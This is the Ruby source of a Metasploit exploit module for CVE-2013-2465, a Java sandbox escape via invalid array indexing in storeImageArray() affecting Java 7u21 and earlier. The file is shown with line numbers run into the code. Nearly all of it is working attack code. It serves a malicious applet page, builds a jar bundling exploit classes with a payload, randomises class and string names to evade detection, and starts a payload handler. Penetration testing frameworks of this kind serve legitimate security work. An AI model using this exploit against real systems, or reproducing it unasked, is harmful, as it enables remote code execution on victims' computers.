Path: blob/master/modules/exploits/multi/browser/java_storeimagearray.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default78include Msf::Exploit::Remote::HttpServer::HTML910# include Msf::Exploit::Remote::BrowserAutopwn11# autopwn_info({ :javascript => false })1213def initialize(info = {})14super(15update_info(16info,17'Name' => 'Java storeImageArray() Invalid Array Indexing Vulnerability',18'Description' => %q{19This module abuses an Invalid Array Indexing Vulnerability on the20static function storeImageArray() function in order to cause a21memory corruption and escape the Java Sandbox. The vulnerability22affects Java version 7u21 and earlier. The module, which doesn't bypass23click2play, has been tested successfully on Java 7u21 on Windows and24Linux systems.25},26'License' => MSF_LICENSE,27'Author' => [28'Unknown', # From PacketStorm29'sinn3r', # Metasploit30'juan vazquez' # Metasploit31],32'References' => [33[ 'CVE', '2013-2465' ],34[ 'OSVDB', '96269' ],35[ 'EDB', '27526' ],36[ 'PACKETSTORM', '122777' ],37[ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/2a9c79db0040' ]38],39'Platform' => %w{java linux win},40'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },41'Targets' => [42[43'Generic (Java Payload)',44{45'Arch' => ARCH_JAVA,46'Platform' => 'java'47}48],49[50'Windows Universal',51{52'Arch' => ARCH_X86,53'Platform' => 'win'54}55],56[57'Linux x86',58{59'Arch' => ARCH_X86,60'Platform' => 'linux'61}62]63],64'DefaultTarget' => 0,65'DisclosureDate' => '2013-08-12',66'Notes' => {67'Reliability' => UNKNOWN_RELIABILITY,68'Stability' => UNKNOWN_STABILITY,69'SideEffects' => UNKNOWN_SIDE_EFFECTS70}71)72)73end7475def setup76path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2465", "Exploit.class")77@exploit_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }78path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2465", "Exploit$MyColorModel.class")79@color_model_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }80path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2465", "Exploit$MyColorSpace.class")81@color_space_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }8283@exploit_class_name = rand_text_alpha("Exploit".length)84@color_model_class_name = rand_text_alpha("MyColorModel".length)85@color_space_class_name = rand_text_alpha("MyColorSpace".length)8687@exploit_class.gsub!("Exploit", @exploit_class_name)88@exploit_class.gsub!("MyColorModel", @color_model_class_name)89@exploit_class.gsub!("MyColorSpace", @color_space_class_name)9091@color_model_class.gsub!("Exploit", @exploit_class_name)92@color_model_class.gsub!("MyColorModel", @color_model_class_name)93@color_model_class.gsub!("MyColorSpace", @color_space_class_name)9495@color_space_class.gsub!("Exploit", @exploit_class_name)96@color_space_class.gsub!("MyColorModel", @color_model_class_name)97@color_space_class.gsub!("MyColorSpace", @color_space_class_name)9899super100end101102def on_request_uri(cli, request)103vprint_status("Requesting: #{request.uri}")104if request.uri !~ /\.jar$/i105if not request.uri =~ /\/$/106vprint_status("Sending redirect...")107send_redirect(cli, "#{get_resource}/", '')108return109end110111print_status("Sending HTML...")112send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })113return114end115116print_status("Sending .jar file...")117send_response(cli, generate_jar(cli), { 'Content-Type' => 'application/java-archive' })118119handler(cli)120end121122def generate_html123jar_name = rand_text_alpha(5 + rand(3))124html = %Q|<html>125<head>126</head>127<body>128<applet archive="#{jar_name}.jar" code="#{@exploit_class_name}" width="1000" height="1000">129</applet>130</body>131</html>132|133html = html.gsub(/^ {4}/, '')134return html135end136137def generate_jar(cli)138p = regenerate_payload(cli)139jar = p.encoded_jar140141jar.add_file("#{@exploit_class_name}.class", @exploit_class)142jar.add_file("#{@exploit_class_name}$#{@color_model_class_name}.class", @color_model_class)143jar.add_file("#{@exploit_class_name}$#{@color_space_class_name}.class", @color_space_class)144metasploit_str = rand_text_alpha("metasploit".length)145payload_str = rand_text_alpha("payload".length)146jar.entries.each { |entry|147entry.name.gsub!("metasploit", metasploit_str)148entry.name.gsub!("Payload", payload_str)149entry.data = entry.data.gsub("metasploit", metasploit_str)150entry.data = entry.data.gsub("Payload", payload_str)151}152jar.build_manifest153154return jar.pack155end156end157158159